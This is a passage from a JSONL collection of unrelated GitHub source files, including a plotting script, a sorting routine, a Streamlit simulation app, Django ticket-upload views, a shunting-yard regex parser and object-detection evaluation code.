1].set_title('Degree Stddev')\n\n # display figure 1 (the scatter plots) and dont pause (block=False)\n plt.show(block=False)\n\n # histogram plot using pandas feature df.hist that\n # creates a figure with 6 subplots (one for each column)\n hist = df.hist(column=[1, 2, 3, 4, 5, 6], figsize=(11, 8))\n hist[0][0].title.set_text('# nodes histogram')\n logger.debug(hist[0][0])\n hist[0][1].title.set_text('# edges histogram')\n hist[1][0].title.set_text('Density histogram')\n hist[1][1].title.set_text('Degree mean histogram')\n hist[2][0].title.set_text('Degree stddev histogram')\n hist[2][1].title.set_text('# clusters histogram')\n hfig = plt.figure(2)\n hfig.suptitle(csvfilename + ' histogram plots', fontsize=16)\n\n # display figure 2 (histograms) and wait (block=True)\n logger.info('Displaying figures and '\n 'waiting for user to close figures')\n plt.show(block=True)\n\n return 0\n\n\ndef main(args):\n \"\"\"\n Main entry point for program\n :param args:\n :return:\n \"\"\"\n desc = \"\"\"\n \n Plots hierarchy stats\n\n \"\"\"\n theargs = _parse_arguments(desc, args[1:])\n theargs.program = args[0]\n\n try:\n _setup_logging(theargs)\n return run(theargs)\n except Exception as e:\n logger.exception('Caught exception')\n return 2\n finally:\n logging.shutdown()\n\n\nif __name__ == '__main__': # pragma: no cover\n sys.exit(main(sys.argv))\n","repo_name":"coleslaw481/ud985","sub_path":"plot_hierarchystats.py","file_name":"plot_hierarchystats.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38582391507","text":"def 
Bubble_Sort(A):\n\tFlag=1\n\twhile Flag==1:\n\t\tFlag=0\n\t\tfor j in range(len(A)-1):\n\t\t\tif(A[j] > A[j+1]):\n\t\t\t\tA[j], A[j+1] = A[j+1], A[j]\n\t\t\t\tFlag=1\n\t\t\t\t\nA = list(range(900,0,-1))\nBubble_Sort(A)\nprint(A)\n","repo_name":"ashwek/Python_Algorithms","sub_path":"2_Sorting_and_Order_Statistics/Bubble_Sort.py","file_name":"Bubble_Sort.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"}
+{"seq_id":"23059603942","text":"import streamlit as st\nfrom simulation import main\nimport plotly.graph_objects as go\n\nst.set_page_config(page_title=\"Liverpool Vs. Real Madrid Penalty Shootout Simulation\", page_icon=\"🏆\", layout=\"centered\", initial_sidebar_state=\"expanded\")\n\nhide_streamlit_style = \"\"\"\n    \n    \"\"\"\nst.markdown(hide_streamlit_style, unsafe_allow_html=True) \n\nst.markdown(\"
<h1>Penalty Shootout Simulation</h1>\", unsafe_allow_html=True)\n\nst.markdown(\"<h2>Simulation Results</h2>\", unsafe_allow_html=True)\n\nlp_wins, lp_win_prob = st.columns(2)\n\nwith lp_wins:\n    st.markdown(f\"<h3>Liverpool Wins</h3>\", unsafe_allow_html=True)\n\n    liverpool_wins = st.empty()\n\nwith lp_win_prob:\n    st.markdown(f\"<h3>Liverpool FC Win Probability</h3>\", unsafe_allow_html=True)\n\n    liverpool_win_probs = st.empty()\n\nrm_wins, rm_win_prob = st.columns(2)\n\nwith rm_wins:\n    st.markdown(f\"<h3>Real Madrid Wins</h3>\", unsafe_allow_html=True)\n\n    real_madrid_wins = st.empty()\n\nwith rm_win_prob:\n    st.markdown(f\"<h3>Real Madrid Win Probability</h3>\", unsafe_allow_html=True)\n\n    real_madrid_win_probs = st.empty()\n\nchart = st.empty()\n\nwith st.sidebar:\n    st.markdown(\"<h2>Simulation Parameters</h2>\", unsafe_allow_html=True)\n    with st.form('Enter the number of simulations to run'):\n        number_of_simulations = st.number_input(\"Number of simulations\", min_value=1, max_value=1000000, value=1000)\n\n\n        button = st.form_submit_button(\"Run Simulation\")\n        # If hover over any button it will darken the button\n        st.markdown('', unsafe_allow_html=True)\n\n\n    if button: \n        results = main(number_of_simulations)\n\n        liverpool_stats = results[0]\n        real_madrid_stats = results[1]\n\n        liverpool_win_count = liverpool_stats[0]\n        liverpool_win_probability = liverpool_stats[1]\n\n        real_madrid_win_count = real_madrid_stats[0]\n        real_madrid_win_probability = real_madrid_stats[1]\n\n\n        liverpool_wins.markdown(f\"\"\"<h2>{liverpool_win_count.__format__(',.0f')}</h2>\"\"\", unsafe_allow_html=True)\n\n        liverpool_win_probs.markdown(f\"<h2>{str(liverpool_win_probability.__format__('.2f'))}%</h2>\", unsafe_allow_html=True)\n\n        real_madrid_wins.markdown(f\"\"\"<h2>{real_madrid_win_count.__format__(',.0f')}</h2>\"\"\", unsafe_allow_html=True)\n\n        real_madrid_win_probs.markdown(f\"<h2>{str(real_madrid_win_probability.__format__('.2f'))}%</h2>
\", unsafe_allow_html=True)\n\n \n\n fig = go.Figure(data=[go.Bar(x=['Liverpool Wins', 'Real Madrid Wins'], y=[liverpool_win_count, real_madrid_win_count], name='Wins')])\n fig.update_layout(title_text='Wins', xaxis_title='Results', yaxis_title='Count')\n \n # Change the color of each bar\n fig.update_traces(marker_color=['#F0544F', '#C6D8D3', '#D81E5B'])\n\n fig.update_layout(title_text=\"Simulation Results\", title_x=0.5)\n\n chart.plotly_chart(fig)\n\n\n\n\n \n\n","repo_name":"colesmcintosh/penalty-shootout-simulation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"38004980318","text":"from enum import Enum\n\nFILE_BOOKS = \"books.json\"\nFILE_CUSTOMER = \"customer.json\"\nFILE_LOANS = \"loans.json\"\n\n'''\nconstant varible menu for the main class\n'''\n\nclass Menu(Enum):\n ADD_A_NEW_CUSTOMER = '1'\n DISPLAY_ALL_CUSTOMERS = '2'\n FIND_CUSTOMER_BY_NAME = '3'\n REMOVE_CUSTOMER = '4'\n ADD_A_NEW_BOOK = '5'\n DISPLAY_ALL_BOOKS = '6'\n FIND_BOOK_BY_NAME = '7'\n REMOVE_BOOK = '8'\n LOAN_A_BOOK = '9'\n RETURN_A_BOOK = '10'\n DISPLAY_ALL_LOANS = '11'\n DISPLAY_LATE_LOANS = '12'\n EXIT = '13'","repo_name":"oferkarp/MyLibory","sub_path":"constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11270095214","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\ntree = {}\r\n\r\nfor _ in range(n):\r\n root, left, right = input().split()\r\n tree[root] = [left, right]\r\n\r\n# 전위순회 = 루트, 왼쪽, 오른쪽\r\ndef preorder(root):\r\n if root != '.':\r\n print(root, end='')\r\n preorder(tree[root][0])\r\n preorder(tree[root][1])\r\n\r\n# 중위순회 = 왼쪽, 루트, 오른쪽\r\ndef inorder(root):\r\n if root != '.':\r\n inorder(tree[root][0])\r\n print(root, end='')\r\n inorder(tree[root][1])\r\n\r\n# 후위순회 = 왼쪽, 오른쪽, 루트 \r\ndef postorder(root):\r\n if root != '.':\r\n postorder(tree[root][0])\r\n postorder(tree[root][1])\r\n print(root, end='')\r\n\r\npreorder('A')\r\nprint()\r\ninorder('A')\r\nprint()\r\npostorder('A')","repo_name":"nevertheless0404/Keep_studying","sub_path":"백준/Silver/1991. 트리 순회/트리 순회.py","file_name":"트리 순회.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"27324781901","text":"\"\"\"A module for dicovering raw two-level rules from a set of carefully chosen examples\n\nExamples, contexts and rules are treated in terms of strings without any\nfinite-state machinery or rule compilation. Examples and contexts are\nspace separated sequences of pair-symbols. \n\n© Kimmo Koskenniemi, 2017-2018. 
Free software under the GPL 3 or later.\n\"\"\"\n\nimport sys\nimport re\nimport cfg\nimport twexamp\n\npair_symbols_for_input = {} # key: input symbol, value: set of pair symbols\npair_symbols_for_output = {}\n\ndef relevant_contexts(pair_symbol):\n \"\"\"Select positive and negative contexts for a given pair-symbol\n \n pair_symbol -- the pair-symbol for which the contexts are selected\n \n returns a tuple of:\n \n pos_context_set -- a set of contexts in the examples where the\n pair_symbol occurs\n \n neg_context_set -- a set of contexts where the input-symbol of the\n pair_symbol occurs with another output-symbol but so that there is\n no example in the example_set where the pair_symbol occurs in such a\n context\n \"\"\"\n input_symbol, output_symbol = cfg.pairsym2sympair(pair_symbol)\n positive_context_set = set()\n negative_context_set = set()\n pairsymlist = [re.sub(r\"([}{])\", r\"\\\\\\1\", psym)\n for psym\n in pair_symbols_for_input[input_symbol]]\n # print(\"pairsymlist:\", pairsymlist) ##\n pattern = re.compile(\"|\".join(pairsymlist))\n for example in cfg.example_set:\n for m in pattern.finditer(example):\n i1 = m.start()\n i2 = m.end()\n # print('\"' + example[0:i1] +'\"', '\"' + example[i2:] + '\"') ##\n left_context = \".#. \" + example[0:i1-1]\n centre = example[i1:i2]\n if i2 >= len(example):\n right_context = \".#.\"\n else:\n right_context = example[i2+1:] + \" .#.\"\n context = (left_context, right_context)\n # print(centre, context) ##\n if centre == pair_symbol:\n positive_context_set.add(context)\n else:\n negative_context_set.add(context)\n negative_context_set = negative_context_set - positive_context_set\n return positive_context_set, negative_context_set\n \ndef ppcontexts(ctxs, title):\n \"\"\"Print a list of context for tracing and debugging\"\"\"\n print(title)\n for lc, rc in sorted(ctxs):\n print(lc, \"_\", rc)\n\ndef shorten_contexts(contexts, left_length, right_length):\n if cfg.verbosity >= 25:\n print(\"left and right length:\", left_length, right_length)\n ppcontexts(contexts, \"contexts as given to shorten_contexts()\")\n new_contexts = set()\n for left_context, right_context in contexts:\n left_lst = left_context.split(\" \")\n start = max(0, len(left_lst) - left_length)\n new_lc = \" \".join(left_lst[start:])\n # print(\"start:\", start, \"new_lc:\", new_lc)\n right_lst = right_context.split(\" \")\n new_rc = \" \".join(right_lst[0:right_length])\n new_contexts.add((new_lc, new_rc))\n return(new_contexts)\n\ndef minimal_contexts(pair_symbol, pos_contexts, neg_contexts):\n \"\"\"Shortens the left and right contexts step by step\n \n Finds shortest contexts which accept correct occurrences of\n pair_symbol and still reject the incorrect occurrences of it.\n \n pair_symbol -- a pair-symbol, e.g. 
'{aä}:a' for which the optimal\n contexts are computed\n \n pos_context, neg_contexts -- selected from the examples\n \n returns a tuple: (positive_contexts, negative_contexts)\n \"\"\"\n if cfg.verbosity >= 25:\n ppcontexts(pos_contexts, \"positive contexts for \" + pair_symbol)\n ppcontexts(neg_contexts, \"negative contexts for \" + pair_symbol)\n # find maximum lengths (in psyms) of left and right contexts\n left_len = 0\n right_len = 0\n for left_context, right_context in pos_contexts:\n lcount = left_context.count(\" \")\n if lcount >= left_len: left_len = lcount + 1\n rcount = right_context.count(\" \")\n if rcount >= right_len: right_len = rcount + 1\n for left_context, right_context in neg_contexts:\n lcount = left_context.count(\" \")\n if lcount >= left_len: left_len = lcount + 1\n rcount = right_context.count(\" \")\n if rcount >= right_len: right_len = rcount + 1\n\n # shorten the contexts stepwise while the positive and\n # the negative contexts stay disjoint\n p_contexts = pos_contexts.copy()\n n_contexts = neg_contexts.copy()\n left_incomplete = True\n right_incomplete = True\n while left_incomplete or right_incomplete:\n # print(left_len, right_len) ##\n if left_incomplete and left_len > 0:\n new_p_contexts = shorten_contexts(p_contexts, left_len-1, right_len)\n new_n_contexts = shorten_contexts(n_contexts, left_len-1, right_len)\n if new_p_contexts.isdisjoint(new_n_contexts):\n # print(\"still disjoint\") ##\n p_contexts = new_p_contexts\n n_contexts = new_n_contexts\n left_len = left_len - 1\n else:\n if cfg.verbosity >= 25:\n print(\"left side now complete\") ##\n ppcontexts(new_p_contexts & new_n_contexts,\n \"intersection of new pos and neg contexts\")\n left_incomplete = False\n elif right_incomplete and right_len > 0:\n new_p_contexts = shorten_contexts(p_contexts, left_len, right_len-1)\n new_n_contexts = shorten_contexts(n_contexts, left_len, right_len-1)\n if new_p_contexts.isdisjoint(new_n_contexts):\n # print(\"still disjoint\") ##\n p_contexts = new_p_contexts\n n_contexts = new_n_contexts\n right_len = right_len - 1\n else:\n # print(\"left side now complete\") ##\n right_incomplete = False\n else:\n break\n if cfg.verbosity >= 25:\n ppcontexts(p_contexts, \"positive contexts\")\n ppcontexts(n_contexts, \"negative contexts\")\n return p_contexts, n_contexts\n\ndef print_rule(pair_symbol, operator, contexts):\n \"\"\"Prints one rule\"\"\"\n print(pair_symbol, operator)\n rule_lst = [\" {} _ {}\".format(lc, rc) for lc, rc in contexts]\n print(\",\\n\".join(rule_lst) + \" ;\")\n return\n\ndef context_to_output_str(pairsym_str):\n pairsym_lst = pairsym_str.split(\" \")\n sympair_lst = [cfg.pairsym2sympair(psym) for psym in pairsym_lst]\n outsym_lst = [outsym for insym, outsym in sympair_lst]\n return \"\".join(outsym_lst)\n\nif __name__ == \"__main__\":\n import argparse\n arpar = argparse.ArgumentParser(\"python3 twdiscov.py\")\n arpar.add_argument(\"examples\", help=\"example pair strings file\",\n default=\"test.pstr\")\n arpar.add_argument(\"-s\", \"--symbol\",\n help=\"input symbol for which to find rules\",\n default=\"\")\n arpar.add_argument(\"-v\", \"--verbosity\",\n help=\"level of diagnostic output\",\n type=int, default=0)\n args = arpar.parse_args()\n\n cfg.verbosity = args.verbosity\n \n twexamp.read_examples(filename=args.examples, build_fsts=False)\n if cfg.verbosity >= 5:\n print(\"--- all examples read in ---\")\n \n for insym in cfg.input_symbol_set:\n pair_symbols_for_input[insym] = set()\n for insym, outsym in cfg.symbol_pair_set:\n 
pair_symbol = cfg.sympair2pairsym(insym, outsym)\n pair_symbols_for_input[insym].add(pair_symbol)\n\n if args.symbol:\n pair_set = pair_symbols_for_input[args.symbol]\n pair_lst = []\n for pairsym in pair_set:\n insym, outsym = cfg.pairsym2sympair(pairsym)\n pair_lst.append((insym, outsym))\n if cfg.verbosity >= 10:\n print(\"pair_lst:\", pair_lst)\n else:\n pair_lst = sorted(cfg.symbol_pair_set)\n\n for insym, outsym in pair_lst:\n if len(pair_symbols_for_input[insym]) <= 1:\n continue\n pair_symbol = cfg.sympair2pairsym(insym, outsym)\n posi_contexts, nega_contexts = relevant_contexts(pair_symbol)\n pos_contexts, neg_contexts = minimal_contexts(pair_symbol,\n posi_contexts.copy(),\n nega_contexts.copy())\n if len(pos_contexts) <= len(neg_contexts) or cfg.verbosity > 0:\n print_rule(pair_symbol, \"=>\", pos_contexts)\n else:\n print_rule(pair_symbol, \"/<=\", neg_contexts)\n if args.verbosity >= 5:\n for lc, rc in posi_contexts:\n l_str = context_to_output_str(lc)\n r_str = context_to_output_str(rc)\n print(\"{:>30}<{}>{}\".format(l_str, outsym, r_str))\n","repo_name":"koskenni/pytwolc","sub_path":"twdiscov.py","file_name":"twdiscov.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"38338190662","text":"# ! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport datetime\nimport os\nimport json\nimport importlib\nfrom multiprocessing import Process\nimport time\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db import connection\nfrom oauthlib.oauth2.rfc6749.tokens import random_token_generator\nfrom django.db import transaction as db_transaction\nfrom django.template.loader import get_template\nfrom django.core.files import File\nimport pathlib2 as pathlib\nfrom django.utils import timezone\n\nfrom el_t01.settings import MEDIA_ROOT, BASE_DIR\n\nfrom el_t01_app.service.service import get_main_args\nfrom el_t01_app.models import Profile, Devices_list, Ticket_type, Device_history\n\nimport requests\nfrom el_t01.env import TOKEN_DEVICE, TOKEN_SERVER, URL_PHOTO, URL_RESULT, URL_FREE\n\n# from rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import permissions\nfrom rest_framework import status\n\nclass CustomerAccessPermission(permissions.BasePermission):\n message = 'Adding customers not allowed.'\n\n def has_permission(self, request, view):\n print (\"has_permission --\")\n # body_unicode = request.body.decode('utf-8')\n # try:\n # body = json.loads(body_unicode)\n # except:\n # body = {}\n m_headers = request.headers\n m_token = m_headers.get(\"Token\", \"\")\n print (\"m_token = \", m_token)\n m_Devices_list = Devices_list.objects.filter(api_token=m_token)\n if m_Devices_list.count() > 0:\n m_Devices_list = m_Devices_list[0]\n return True\n else:\n return False\n\nclass FileUploadView_Vvs(APIView):\n print (\"FileUploadView_Vvs\")\n permission_classes = [CustomerAccessPermission]\n # parser_classes = (FileUploadView_Vvs, )\n\n def post(self, request, format='jpg'):\n m_return = {\"status\": \"error\"}\n m_headers = request.headers\n m_token = m_headers.get(\"Token\", \"\")\n m_jellyfish_type = m_headers.get(\"JellyfishType\", \"\")\n m_ticket_type = m_headers.get(\"TicketType\", \"\")\n m_ticketid = m_headers.get(\"TicketId\", \"\")\n\n 
print (\"m_token = \", m_token )\n print (\"m_jellyfish_type = \", m_jellyfish_type )\n print (\"m_ticket_type = \", m_ticket_type )\n print (\"m_ticketid = \", m_ticketid )\n\n # если новая система - ищем запись\n # если старвя система - создаем запись\n\n # найти запись в истории\n try:\n t_ticket_history = Device_history.objects.get(id=m_ticketid)\n except:\n pass\n\n m_Devices_list = Devices_list.objects.filter(api_token=m_token)\n print (\"m_Devices_list.count() = \", m_Devices_list.count() )\n # ToDo\n if m_Devices_list.count() > 0:\n m_Devices_item = m_Devices_list[0]\n else:\n m_Devices_item = None\n\n if m_Devices_item is not None:\n if request.FILES:\n print (\"FILES YES\")\n if 'image' in request.FILES:\n file_to_upload = request.FILES['image']\n m_time_now = datetime.datetime.strftime(datetime.datetime.now(), \"%Y%m%d%H%M%S\")\n m_dir_short = os.path.join('media', 'ticket_in', str(m_Devices_item.id))\n m_file_name = \"in_{}_{}_{}.png\".format(m_ticketid, m_ticket_type, m_time_now )\n m_file_short = os.path.join(m_dir_short, m_file_name)\n m_dir_full = os.path.join(BASE_DIR, m_dir_short)\n m_file_full = os.path.join(m_dir_full, m_file_name)\n print (\"m_file_full = \", m_file_full)\n file_in = File(file_to_upload)\n with open(m_file_full, 'wb+') as file_out:\n for chunk in file_in.chunks():\n file_out.write(chunk)\n\n m_return = {\"status\": \"ok\"}\n\n if t_ticket_history.game_type.verbal == \"01\":\n from el_t01_app.service.v003.def_ticket_01 import TicketJob\n elif t_ticket_history.game_type.verbal == \"02\":\n from el_t01_app.service.v003.def_ticket_02 import TicketJob\n elif t_ticket_history.game_type.verbal == \"03\":\n from el_t01_app.service.v003.def_ticket_03 import TicketJob\n elif t_ticket_history.game_type.verbal == \"04\":\n from el_t01_app.service.v003.def_ticket_04 import TicketJob\n elif t_ticket_history.game_type.verbal == \"05\":\n from el_t01_app.service.v003.def_ticket_05 import TicketJob\n\n if m_ticket_type == \"01\":\n t_ticket_history.img_01 = m_file_short\n t_ticket_history.step_ticket = m_ticket_type\n t_ticket_history.save()\n ItemJob = TicketJob(item_ticket_job=t_ticket_history)\n m_return = ItemJob.run_job_01()\n\n if m_ticket_type == \"02\":\n t_ticket_history.img_02 = m_file_short\n t_ticket_history.step_ticket = m_ticket_type\n t_ticket_history.save()\n ItemJob = TicketJob(item_ticket_job=t_ticket_history)\n m_return = ItemJob.run_job_02()\n\n else:\n print (\"FILES NO\")\n\n return Response(m_return)\n\n\nclass Tickets_Get_Vvs(APIView):\n print (\"Tickets_Get_Vvs\")\n permission_classes = [CustomerAccessPermission]\n # parser_classes = (FileUploadView_Vvs, )\n\n def post(self, request, format='jpg'):\n m_return = {\"status\": \"error\"}\n m_headers = request.headers\n m_token = m_headers.get(\"Token\", \"\")\n m_jellyfish_type = m_headers.get(\"JellyfishType\", \"\")\n m_ticket_type = m_headers.get(\"TicketType\", \"\")\n m_ticketid = m_headers.get(\"TicketId\", \"\")\n\n try:\n m_Devices_item = Devices_list.objects.get(api_token=m_token)\n except:\n return Response([])\n\n ## api_token\n\n print (\"m_token = \", m_token )\n print (\"m_jellyfish_type = \", m_jellyfish_type )\n print (\"m_ticket_type = \", m_ticket_type )\n print (\"m_ticketid = \", m_ticketid, type(m_ticketid) )\n\n body_unicode = request.body.decode('utf-8')\n print (\"body_unicode = \", body_unicode )\n body_data = json.loads(body_unicode)\n print (\"body_data = \", body_data )\n m_tickets_in = body_data.get('JobTickets',[])\n print (\"m_tickets_in = \", m_tickets_in )\n\n 
m_device_ticket_list = []\n for item_ticket in m_tickets_in:\n t_history = Device_history()\n t_history.req_id = item_ticket\n t_history.req_dt = timezone.now()\n t_history.step_job = \"\"\n t_history.type_ticket = m_Devices_item.t_type.verbal\n t_history.status = \"00\"\n t_history.type_jellyfish = \"02\"\n t_history.t_dev_id = m_Devices_item.id\n t_history.save()\n m_device_ticket_list.append(t_history.id)\n\n t_history.send_free = True\n t_history.save()\n\n m_return = {\"status\": \"ok\", \"ticket_list\": m_device_ticket_list}\n return Response(m_return)\n","repo_name":"Never11n/el_t01","sub_path":"el_t01_app/views_vvs_rest.py","file_name":"views_vvs_rest.py","file_ext":"py","file_size_in_byte":7626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30532545034","text":"# https://leetcode.com/problems/basic-calculator/solutions/1662949/python-actually-working-shunting-yard-that-passes-all-edge-cases/\n\nfrom machine import Stack\nimport re\nEPSILON = 'ε'\nPRECEDENCE = {'|': 1, '%': 1, '?': 2, '@': 2, '#': 2}\n\n\n# Shunting Yard algorithm\ndef shunting_yard(expression):\n postfix = ''\n tempStack = []\n formatted_regex = clean_regex(expression)\n print(formatted_regex)\n for char in formatted_regex:\n if char == '(':\n tempStack.append(char)\n elif char == ')':\n while tempStack[-1] != '(':\n postfix += tempStack.pop()\n tempStack.pop()\n # Operator\n else:\n while len(tempStack) > 0:\n top_char = tempStack[-1]\n current_char_precedence = get_precedence(char)\n top_char_precedence = get_precedence(top_char)\n if top_char_precedence >= current_char_precedence:\n postfix += tempStack.pop()\n else:\n break\n tempStack.append(char)\n while tempStack:\n # Processing the postfix\n postfix += tempStack.pop()\n return postfix\n\n\n# We need to explicitly include '.' 
between concats\n# This is needed to create valid postfix expressions for shunting yard\ndef clean_regex(expression):\n ans = ''\n # Both of the ones below can be extended to support many operation types (*/** etc)\n ops = set(['?', '#', '|', '@', '%'])\n bOps = set(['|', '%'])\n for i in range(len(expression)):\n char1 = expression[i]\n if i + 1 < len(expression):\n char2 = expression[i + 1]\n ans += char1\n if char1 != '(' and char2 != ')' and char2 not in ops and char1 not in bOps:\n ans += '%'\n ans += expression[-1]\n return ans\n\n\n\"\"\"\n this is needed to create valid postfix expressions for shunting yard\n eg: 1 - (-2) creates a postfix of 1 2 - - which is invalid\n instead we convert to 1 0 2 - -\n\"\"\"\n\n\ndef get_precedence(char):\n return PRECEDENCE.get(char, 6)\n\n\n# Shunting Yard algorithm\nclass ShuntingYard:\n\n # Operator precedence dictionary\n PRECEDENCE = {'|': 1, '%': 1, '?': 2, '@': 2, '#': 2}\n OPERATORS = set(PRECEDENCE.keys())\n SYMBOLS = OPERATORS.union({'(', ')', EPSILON})\n\n def __init__(this):\n this.stack = Stack()\n this.output = []\n this.post_result = \"\"\n\n def concatenation(this, regex):\n reg_len = len(regex) - 1\n symbols = set([\"(\", \"|\", \"?\", \"#\", \"%\", \"@\", \")\"])\n result = []\n for i in range(reg_len):\n result.append(regex[i])\n if regex[i] not in symbols and (regex[i+1] not in symbols or regex[i+1] == '('):\n result.append(\"%\")\n else:\n case = {\n regex[i] in {\"@\", \"?\", \")\"} and regex[i+1] == \"(\": \"%\",\n regex[i] in {\"@\", \"?\", \"#\", \")\"} and regex[i+1] not in symbols: \"%\",\n }.get(True, \"\")\n result.append(case)\n result.append(regex[reg_len])\n return \"\".join(result)\n\n def revision(this, char):\n try:\n a = this.PRECEDENCE[char]\n b = this.PRECEDENCE[this.stack.peek()]\n return a <= b if a >= 0 and b >= 0 else False\n except KeyError:\n return False\n\n def to_postfix(this, regex):\n exp = this.concatenation(regex)\n for i in exp:\n if i.isalnum() or i == EPSILON:\n if this.stack.peek() in (\"@\", \"#\", \"?\"):\n this.output.append(this.stack.pop())\n this.output.append(i)\n elif i == '(':\n this.stack.push(i)\n elif i == ')':\n while not this.stack.is_empty() and this.stack.peek() != '(':\n a = this.stack.pop()\n this.output.append(a)\n if this.stack.is_empty() or this.stack.peek() != '(':\n return -1\n else:\n this.stack.pop()\n else:\n while not this.stack.is_empty() and this.revision(i):\n this.output.append(this.stack.pop())\n this.stack.push(i)\n while not this.stack.is_empty():\n this.output.append(this.stack.pop())\n this.post_result = \"\".join(this.output)\n return this.post_result\n","repo_name":"DavidDLM/Lab-D-Lenguajes","sub_path":"postfix.py","file_name":"postfix.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71190856158","text":"from sklearn.metrics import average_precision_score\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\nfrom deepforest.utilities import check_file\nfrom deepforest import IoU\nfrom shapely.geometry import box\n\n\n\n\ndef evaluate(m, csv='val_samples/val_samples.csv', folder=\"./val_samples\"):\n results = m.evaluate(csv, folder)\n p = results['box_precision']\n r = results['box_recall']\n\n if (p + r) == 0:\n f1 = 0\n else:\n f1 = 2 * p * r / (p + r)\n return results, f1, results['AP']\n\n\ndef evaluate_image(predictions, ground_df):\n \"\"\"\n Compute intersection-over-union matching among prediction and ground truth boxes for one 
image\n    Args:\n        predictions: a pandas dataframe of predicted boxes with columns image_path, xmin, ymin, xmax, ymax, label\n        ground_df: a pandas dataframe of ground truth boxes with the same columns\n    Returns:\n        result: pandas dataframe with crown ids of prediction and ground truth and the IoU score.\n    \"\"\"\n    plot_names = predictions[\"image_path\"].unique()\n    if len(plot_names) > 1:\n        raise ValueError(\"More than one plot passed to image crown: {}\".format(plot_names))\n    else:\n        plot_name = plot_names[0]\n\n    predictions['geometry'] = predictions.apply(\n        lambda x: box(x.xmin, x.ymin, x.xmax, x.ymax), axis=1)\n    predictions = gpd.GeoDataFrame(predictions, geometry='geometry')\n\n    ground_df['geometry'] = ground_df.apply(\n        lambda x: box(x.xmin, x.ymin, x.xmax, x.ymax), axis=1)\n    ground_df = gpd.GeoDataFrame(ground_df, geometry='geometry')\n\n    # match\n    result = IoU.compute_IoU(ground_df, predictions)\n\n    # add the label classes\n    result[\"predicted_label\"] = result.prediction_id.apply(lambda x: predictions.label.loc[x] if pd.notnull(x) else x)\n    result[\"true_label\"] = result.truth_id.apply(lambda x: ground_df.label.loc[x])\n    result['predicted_area'] = predictions['geometry'].apply(lambda x: x.area)\n    return result\n\n\ndef evaluate2(predictions,\n              ground_df,\n              root_dir,\n              iou_threshold=0.4):\n    \"\"\"\n    Takes as input the predictions and ground truth to compute IoU for predictions and calculate AP\n    Args:\n        predictions: a pandas dataframe, if supplied a root dir is needed to give the relative path of files in df.name. The labels in ground truth and predictions must match. If one is numeric, the other must be numeric.\n        ground_df: a pandas dataframe, if supplied a root dir is needed to give the relative path of files in df.name\n        root_dir: location of files in the dataframe 'name' column.\n    Returns:\n        results: a dataframe of matched bounding boxes\n        box_recall: proportion of true positives of box position, regardless of class\n        box_precision: proportion of predictions that are true positive, regardless of class\n        class_recall: a pandas dataframe of class level recall and precision with class sizes\n        AP: average precision\n    \"\"\"\n\n    check_file(ground_df)\n    check_file(predictions)\n\n    # Run evaluation on all plots\n    results = []\n    box_recalls = []\n    box_precisions = []\n    recalls = []\n    precisions = []\n    for image_path, group in ground_df.groupby(\"image_path\"):\n        # clean indices\n        image_predictions = predictions[predictions[\"image_path\"] == image_path].reset_index(drop=True)\n\n        # If empty, add to list without computing IoU\n        if image_predictions.empty:\n            result = pd.DataFrame(\n                {\"truth_id\": group.index.values, \"prediction_id\": None, \"IoU\": 0, \"predicted_label\": None,\n                 \"score\": None, \"match\": None, \"true_label\": group.label})\n            # An empty prediction set has recall of 0, precision of NA.\n            box_recalls.append(0)\n            results.append(result)\n            continue\n        else:\n            group = group.reset_index(drop=True)\n            result = evaluate_image(predictions=image_predictions,\n                                    ground_df=group)\n\n        result[\"image_path\"] = image_path\n        result['IoU'] = result['IoU'].fillna(0)\n        result[\"match\"] = result.IoU > iou_threshold\n        true_positive = sum(result[\"match\"])\n        recall = true_positive / result.shape[0]\n        precision = true_positive / image_predictions.shape[0]\n        box_recalls.append(recall)\n        box_precisions.append(precision)\n        results.append(result)\n\n    results = pd.concat(results)\n    box_precision = np.mean(box_precisions)\n    box_recall = np.mean(box_recalls)\n\n    # Per 
class recall and precision\n class_recall_dict = {}\n class_precision_dict = {}\n class_size = {}\n\n box_results = results[results.predicted_label.notna()]\n if box_precision > 0 and box_recall > 0:\n results2 = results.dropna(subset=['score'])\n results2['match'] = results2.IoU > iou_threshold\n AP = average_precision_score(results2['match'], results2['score'])\n else:\n AP = 0\n if box_results.empty:\n print(\"No predictions made\")\n box_recall = 0\n box_precision = 0\n class_recall = pd.DataFrame()\n return {\"results\": results, \"box_precision\": box_precision, \"box_recall\": box_recall,\n \"class_recall\": class_recall, 'AP': 0}\n\n for name, group in box_results.groupby(\"true_label\"):\n class_recall_dict[name] = sum(group.true_label == group.predicted_label) / group.shape[0]\n number_of_predictions = group[group.predicted_label == name].shape[0]\n if number_of_predictions == 0:\n class_precision_dict[name] = 0\n else:\n class_precision_dict[name] = sum(group.true_label == group.predicted_label) / number_of_predictions\n class_size[name] = group.shape[0]\n\n class_recall = pd.DataFrame({\"label\": class_recall_dict.keys(), \"recall\": pd.Series(class_recall_dict),\n \"precision\": pd.Series(class_precision_dict),\n \"size\": pd.Series(class_size)}).reset_index(drop=True)\n\n return {\"results\": results, 